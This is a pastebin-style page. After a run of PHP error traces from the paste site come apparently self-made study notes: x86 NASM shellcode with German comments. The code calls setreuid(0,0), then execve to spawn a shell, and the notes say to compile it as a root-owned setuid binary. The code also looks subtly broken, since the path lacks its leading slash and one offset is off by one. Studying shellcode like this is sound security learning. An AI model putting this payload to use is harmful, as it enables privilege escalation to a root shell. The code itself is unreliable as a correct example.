A PHP Error was encountered

Severity: 8192

Message: Function create_function() is deprecated

Filename: geshi/geshi.php

Line Number: 4698

Backtrace:

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 4698
Function: _error_handler

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 4621
Function: _optimize_regexp_list_tokens_to_string

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 1655
Function: optimize_regexp_list

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 2029
Function: optimize_keyword_group

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/geshi/geshi.php
Line: 2168
Function: build_parse_cache

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/libraries/Process.php
Line: 45
Function: parse_code

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/models/Pastes.php
Line: 517
Function: syntax

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/controllers/Main.php
Line: 624
Function: getPaste

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/index.php
Line: 315
Function: require_once

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/system/core/Exceptions.php:271)

Filename: view/download.php

Line Number: 2

Backtrace:

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/themes/geocities/views/view/download.php
Line: 2
Function: header

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 173
Function: include

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 43
Function: _ci_load

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/controllers/Main.php
Line: 625
Function: view

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/index.php
Line: 315
Function: require_once

A PHP Error was encountered

Severity: Warning

Message: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/system/core/Exceptions.php:271)

Filename: view/download.php

Line Number: 3

Backtrace:

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/themes/geocities/views/view/download.php
Line: 3
Function: header

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 173
Function: include

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/core/MY_Loader.php
Line: 43
Function: _ci_load

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/application/controllers/Main.php
Line: 625
Function: view

File: /home/httpd/vhosts/scratchbook.ch/geopaste.scratchbook.ch/index.php
Line: 315
Function: require_once

; tutorial für shellcodes http://wiki.hackerboard.de/index.php/Shellcode_(Exploit) ; unix syscalls sind zu finden unter /usr/include/asm/unistd.h section .data filepath db "bin/shXAAAABBBB" ;der sting section .text global _start ;einsprung punkt dürs DLF linking _start: ;zu erst Syscall 70 -> setreuid(uid_t ruid,uid_t uid) mov eax, 70 ; schreibt die 70 in das regiser wo der syscall erwartet wird mov ebx, 0 ; erste ruid parameter mov ecx, 0 ; zweite ruid parameter int 0x80 ; initialize systemcall - sagt dem kernel das der systemcall ausgeführt werden soll ; jetz alles vorbeiten für syscall 11 -> execve ( const char *finename, char *const argv[], char *const envp[]) mov eax, 0 mov ebx, filepath ; schreibt die adresse des strings nach ebx mov [ebx+7], al ; schreibt das 0 aus AEX wobai X im Stuing liegt mov [ebx+8], ebx ; schreibt die adresse des stings ab position 8 , das wären 4 mal A mov [ebx+12], eax ; schreibt die adresse des stings ab position 12 , das wären 4 mal B mov eax, 11 ; schreibt die 11 in das regiser wo der syscall erwartet wird mov ecx, [ebx+8] ;läd die adresse an der sich AAAA im sting befand nach ecx mov edx, [ebx+12] ;läd die adresse an der sich BBBB im sting befand nach edx int 0x80 ; wieder wie oben dem kernel sagen das der system call ausgeführt werden soll ; compiliren mit ; nasm -f elf shell.asm ; ld shell.o ; sudo chown root a.out ; sudo chmod +s a.out ; ./a.out